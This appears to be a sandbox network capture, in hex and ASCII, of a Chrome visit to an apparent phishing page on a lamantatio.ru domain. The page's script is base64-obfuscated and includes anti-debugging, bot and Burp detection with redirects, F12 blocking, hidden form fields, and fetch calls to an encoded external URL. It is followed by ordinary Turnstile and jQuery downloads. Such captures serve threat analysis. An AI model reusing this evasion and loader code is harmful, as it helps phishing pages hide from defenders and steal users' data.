                                                            2025-01-06 15:53:47 UTC1369INData Raw: 31 35 33 32 0d 0a 3c 21 2d 2d 20 53 75 63 63 65 73 73 20 69 73 20 6e 6f 74 20 74 68 65 20 6b 65 79 20 74 6f 20 68 61 70 70 69 6e 65 73 73 2e 20 48 61 70 70 69 6e 65 73 73 20 69 73 20 74 68 65 20 6b 65 79 20 74 6f 20 73 75 63 63 65 73 73 2e 20 49 66 20 79 6f 75 20 6c 6f 76 65 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 64 6f 69 6e 67 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 73 75 63 63 65 73 73 66 75 6c 2e 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 53 75 63 63 65 73 73 20 69 73 20 6e 6f 74 20 68 6f 77 20 68 69 67 68 20 79 6f 75 20 68 61 76 65 20 63 6c 69 6d 62 65 64 2c 20 62 75 74 20 68 6f 77 20 79 6f 75 20 6d 61 6b 65 20 61 20 70 6f 73 69 74 69 76 65 20 64 69 66 66 65 72 65 6e 63 65 20 74 6f 20 74 68 65 20 77 6f 72 6c 64 2e 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 3e
                                                            Data Ascii: 1532... Success is not the key to happiness. Happiness is the key to success. If you love what you are doing, you will be successful. -->... Success is not how high you have climbed, but how you make a positive difference to the world. --><script>
                                                            2025-01-06 15:53:47 UTC1369INData Raw: 61 57 64 6f 64 44 6f 78 4c 6a 49 37 66 51 30 4b 49 32 35 69 56 58 6c 55 54 6d 74 6a 55 58 51 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6d 4e 68 62 47 4d 6f 4d 53 34 7a 4b 54 74 39 44 51 70 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 32 35 69 56 58 6c 55 54 6d 74 6a 55 58 51 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 62 6d 4a 56 65 56 52 4f 61 32 4e 52 64 43 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 32 35 69 56 58 6c 55 54 6d 74 6a 55 58 51 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c
                                                            Data Ascii: aWdodDoxLjI7fQ0KI25iVXlUTmtjUXQgaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI25iVXlUTmtjUXQgaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojbmJVeVROa2NRdCBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI25iVXlUTmtjUXQuY2FwdGNoYS1jb250YWl
                                                            2025-01-06 15:53:47 UTC1369INData Raw: 57 64 6c 62 6e 51 75 61 57 35 6a 62 48 56 6b 5a 58 4d 6f 49 6b 4a 31 63 6e 41 69 4b 53 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 33 61 57 35 6b 62 33 63 75 62 47 39 6a 59 58 52 70 62 32 34 67 50 53 41 69 59 57 4a 76 64 58 51 36 59 6d 78 68 62 6d 73 69 4f 77 30 4b 66 51 30 4b 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 57 52 6b 52 58 5a 6c 62 6e 52 4d 61 58 4e 30 5a 57 35 6c 63 69 67 6e 61 32 56 35 5a 47 39 33 62 69 63 73 49 47 5a 31 62 6d 4e 30 61 57 39 75 4b 47 56 32 5a 57 35 30 4b 53 42 37 44 51 6f 67 49 43 41 67 61 57 59 67 4b 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 45 79 4d 79 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 70
                                                            Data Ascii: WdlbnQuaW5jbHVkZXMoIkJ1cnAiKSkgew0KICAgICAgICB3aW5kb3cubG9jYXRpb24gPSAiYWJvdXQ6YmxhbmsiOw0KfQ0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGZ1bmN0aW9uKGV2ZW50KSB7DQogICAgaWYgKGV2ZW50LmtleUNvZGUgPT09IDEyMykgew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgp
                                                            2025-01-06 15:53:47 UTC1327INData Raw: 56 4a 55 33 4a 6d 62 45 52 77 62 6d 67 6f 4b 53 42 37 44 51 6f 67 49 43 41 67 62 47 56 30 49 46 56 55 63 32 52 61 63 6b 74 36 59 55 38 67 50 53 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 6a 62 32 35 7a 64 43 42 49 54 6c 4e 78 59 33 64 5a 5a 30 6c 57 49 44 30 67 4d 54 41 77 4f 77 30 4b 49 43 41 67 49 48 4e 6c 64 45 6c 75 64 47 56 79 64 6d 46 73 4b 47 5a 31 62 6d 4e 30 61 57 39 75 4b 43 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 35 7a 64 43 42 4b 52 33 68 70 61 30 4a 51 54 6e 56 43 49 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 52 6c 59 6e 56 6e 5a 32 56 79 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 35 7a 64 43 42 6f 52 58 70 72 55 30 5a 75 62
                                                            Data Ascii: VJU3JmbERwbmgoKSB7DQogICAgbGV0IFVUc2Rackt6YU8gPSBmYWxzZTsNCiAgICBjb25zdCBITlNxY3dZZ0lWID0gMTAwOw0KICAgIHNldEludGVydmFsKGZ1bmN0aW9uKCkgew0KICAgICAgICBjb25zdCBKR3hpa0JQTnVCID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGRlYnVnZ2VyOw0KICAgICAgICBjb25zdCBoRXprU0Zub
                                                            2025-01-06 15:53:47 UTC1369INData Raw: 33 39 37 37 0d 0a 67 61 57 51 39 49 6d 4a 73 64 47 52 70 63 43 49 67 62 6d 46 74 5a 54 30 69 59 6d 78 30 5a 47 6c 77 49 69 42 32 59 57 78 31 5a 54 30 69 56 57 35 72 62 6d 39 33 62 69 49 2b 44 51 6f 38 61 57 35 77 64 58 51 67 64 48 6c 77 5a 54 30 69 61 47 6c 6b 5a 47 56 75 49 69 42 70 5a 44 30 69 59 6d 78 30 5a 48 4a 6c 5a 69 49 67 62 6d 46 74 5a 54 30 69 59 6d 78 30 5a 48 4a 6c 5a 69 49 67 64 6d 46 73 64 57 55 39 49 6d 68 30 64 48 42 7a 4f 69 38 76 65 48 4a 6c 4c 6e 64 36 63 69 35 74 65 57 4a 73 64 57 56 6f 62 33 4e 30 61 57 34 75 62 57 55 76 49 6a 34 4e 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 64 57 45 69 49 47 35 68 62 57 55 39 49 6d 4a 73 64 47 52 31 59 53 49 67 64 6d 46 73
                                                            Data Ascii: 3977gaWQ9ImJsdGRpcCIgbmFtZT0iYmx0ZGlwIiB2YWx1ZT0iVW5rbm93biI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBpZD0iYmx0ZHJlZiIgbmFtZT0iYmx0ZHJlZiIgdmFsdWU9Imh0dHBzOi8veHJlLnd6ci5teWJsdWVob3N0aW4ubWUvIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkdWEiIG5hbWU9ImJsdGR1YSIgdmFs
                                                            2025-01-06 15:53:47 UTC1369INData Raw: 6c 4a 54 55 78 56 57 45 74 48 57 6c 64 53 53 45 31 46 53 6c 46 55 53 31 46 43 51 6b 39 52 57 55 5a 4f 56 56 56 4f 54 31 52 46 54 45 68 55 56 45 4e 4c 4a 79 77 67 65 77 30 4b 49 43 41 67 49 47 31 6c 64 47 68 76 5a 44 6f 67 49 6b 64 46 56 43 49 73 44 51 6f 67 49 43 41 67 66 53 6b 75 64 47 68 6c 62 69 68 79 5a 58 4e 77 62 32 35 7a 5a 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 63 6d 56 30 64 58 4a 75 49 48 4a 6c 63 33 42 76 62 6e 4e 6c 4c 6e 52 6c 65 48 51 6f 4b 51 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 64 47 56 34 64 43 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 61 57 59 6f 64 47 56 34 64 43 41 39 50 53 41 77 4b 58 73 4e 43 69 41 67 49 43 42 6d 5a 58 52 6a 61 43 68 54 63 31 70 4b 51 30 56 36 56 6d 56 79 4c 43 42 37 44 51 6f 67 49 43 41 67 49
                                                            Data Ascii: lJTUxVWEtHWldSSE1FSlFUS1FCQk9RWUZOVVVOT1RFTEhUVENLJywgew0KICAgIG1ldGhvZDogIkdFVCIsDQogICAgfSkudGhlbihyZXNwb25zZSA9PiB7DQogICAgcmV0dXJuIHJlc3BvbnNlLnRleHQoKQ0KICAgIH0pLnRoZW4odGV4dCA9PiB7DQogICAgaWYodGV4dCA9PSAwKXsNCiAgICBmZXRjaChTc1pKQ0V6VmVyLCB7DQogICAgI
                                                            2025-01-06 15:53:47 UTC1369INData Raw: 20 59 44 6c 48 51 53 64 6c 42 68 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2e 73 70 6c 69 74 28 27 2e 27 29 2e 73 6c 69 63 65 28 2d 32 29 2e 6a 6f 69 6e 28 27 2e 27 29 3b 0d 0a 63 6f 6e 73 74 20 47 71 61 44 51 65 75 42 49 63 20 3d 20 6e 65 77 20 55 52 4c 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 68 5a 79 35 73 59 57 31 68 62 6e 52 68 64 47 6c 76 4c 6e 4a 31 4c 31 70 54 5a 57 6b 76 22 29 29 3b 0d 0a 63 6f 6e 73 74 20 52 5a 4c 47 4a 43 54 46 56 4a 20 3d 20 47 71 61 44 51 65 75 42 49 63 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 59 44 6c 48 51 53 64 6c 42 68 20 3f 20 47 71 61 44 51 65 75 42 49 63 2e 68 6f 73 74 6e 61 6d 65 20 3a 20 47 71 61 44 51 65 75 42 49 63 2e 68 6f 73 74 6e 61 6d 65 2e 73 70 6c 69 74 28
                                                            Data Ascii: YDlHQSdlBh = window.location.hostname.split('.').slice(-2).join('.');const GqaDQeuBIc = new URL(atob("aHR0cHM6Ly9hZy5sYW1hbnRhdGlvLnJ1L1pTZWkv"));const RZLGJCTFVJ = GqaDQeuBIc.hostname === YDlHQSdlBh ? GqaDQeuBIc.hostname : GqaDQeuBIc.hostname.split(
                                                            2025-01-06 15:53:47 UTC1369INData Raw: 67 49 47 4a 68 59 32 74 6e 63 6d 39 31 62 6d 51 74 59 32 39 73 62 33 49 36 49 43 4e 6d 5a 6d 59 37 44 51 6f 67 49 47 68 6c 61 57 64 6f 64 44 6f 67 4d 54 41 77 4a 54 73 4e 43 69 41 67 62 33 5a 6c 63 6d 5a 73 62 33 63 36 49 47 68 70 5a 47 52 6c 62 6a 73 4e 43 6e 30 4e 43 69 4e 75 59 6c 56 35 56 45 35 72 59 31 46 30 49 47 67 30 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 69 34 31 63 6d 56 74 4f 32 5a 76 62 6e 51 74 64 32 56 70 5a 32 68 30 4f 6a 55 77 4d 44 74 73 61 57 35 6c 4c 57 68 6c 61 57 64 6f 64 44 6f 78 4c 6a 49 37 66 51 30 4b 49 32 35 69 56 58 6c 55 54 6d 74 6a 55 58 51 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6d 4e 68 62 47 4d 6f 4d 53 34 7a 4b 54 74 39 44 51 70 41 62 57
                                                            Data Ascii: gIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiAgb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCiNuYlV5VE5rY1F0IGg0e21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOi41cmVtO2ZvbnQtd2VpZ2h0OjUwMDtsaW5lLWhlaWdodDoxLjI7fQ0KI25iVXlUTmtjUXQgaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbW
                                                            2025-01-06 15:53:47 UTC1369INData Raw: 63 48 67 37 62 57 46 79 5a 32 6c 75 4c 58 52 76 63 44 6f 67 4c 6a 56 79 5a 57 30 37 66 51 30 4b 49 43 41 67 49 44 77 76 63 33 52 35 62 47 55 2b 44 51 6f 67 49 43 41 67 50 48 4e 6a 63 6d 6c 77 64 44 34 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 62 6d 46 32 61 57 64 68 64 47 39 79 4c 6e 64 6c 59 6d 52 79 61 58 5a 6c 63 69 42 38 66 43 42 33 61 57 35 6b 62 33 63 75 59 32 46 73 62 46 42 6f 59 57 35 30 62 32 30 67 66 48 77 67 64 32 6c 75 5a 47 39 33 4c 6c 39 77 61 47 46 75 64 47 39 74 49 48 78 38 49 47 35 68 64 6d 6c 6e 59 58 52 76 63 69 35 31 63 32 56 79 51 57 64 6c 62 6e 51 75 61 57 35 6a 62 48 56 6b 5a 58 4d 6f 49 6b 4a 31 63 6e 41 69 4b 53 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 33 61 57 35 6b 62 33 63 75 62 47 39 6a 59 58 52 70 62 32 34 67 50 53 41
                                                            Data Ascii: cHg7bWFyZ2luLXRvcDogLjVyZW07fQ0KICAgIDwvc3R5bGU+DQogICAgPHNjcmlwdD4NCiAgICBpZiAobmF2aWdhdG9yLndlYmRyaXZlciB8fCB3aW5kb3cuY2FsbFBoYW50b20gfHwgd2luZG93Ll9waGFudG9tIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5jbHVkZXMoIkJ1cnAiKSkgew0KICAgICAgICB3aW5kb3cubG9jYXRpb24gPSA


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.449758104.18.94.414433132C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-06 15:53:47 UTC650OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://gimd.lamantatio.ru/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-06 15:53:47 UTC386INHTTP/1.1 302 Found
                                                            Date: Mon, 06 Jan 2025 15:53:47 GMT
                                                            Content-Length: 0
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                            cross-origin-resource-policy: cross-origin
                                                            location: /turnstile/v0/g/849bfe45bf45/api.js
                                                            Server: cloudflare
                                                            CF-RAY: 8fdce209db0e7c7e-EWR
                                                            alt-svc: h3=":443"; ma=86400


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.449757151.101.2.1374433132C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-06 15:53:47 UTC624OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                            Host: code.jquery.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://gimd.lamantatio.ru/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-06 15:53:47 UTC611INHTTP/1.1 200 OK
                                                            Connection: close
                                                            Content-Length: 89501
                                                            Server: nginx
                                                            Content-Type: application/javascript; charset=utf-8
                                                            Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                            ETag: "28feccc0-15d9d"
                                                            Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Via: 1.1 varnish, 1.1 varnish
                                                            Accept-Ranges: bytes
                                                            Age: 1663354
                                                            Date: Mon, 06 Jan 2025 15:53:47 GMT
                                                            X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890071-NYC
                                                            X-Cache: HIT, HIT
                                                            X-Cache-Hits: 55, 0
                                                            X-Timer: S1736178828.800618,VS0,VE1
                                                            Vary: Accept-Encoding
                                                            2025-01-06 15:53:47 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                            Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                            2025-01-06 15:53:47 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                            Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                            2025-01-06 15:53:47 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                            Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                            2025-01-06 15:53:47 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                            Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                            2025-01-06 15:53:47 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                            Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                            2025-01-06 15:53:47 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                            Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                            2025-01-06 15:53:47 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                            Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
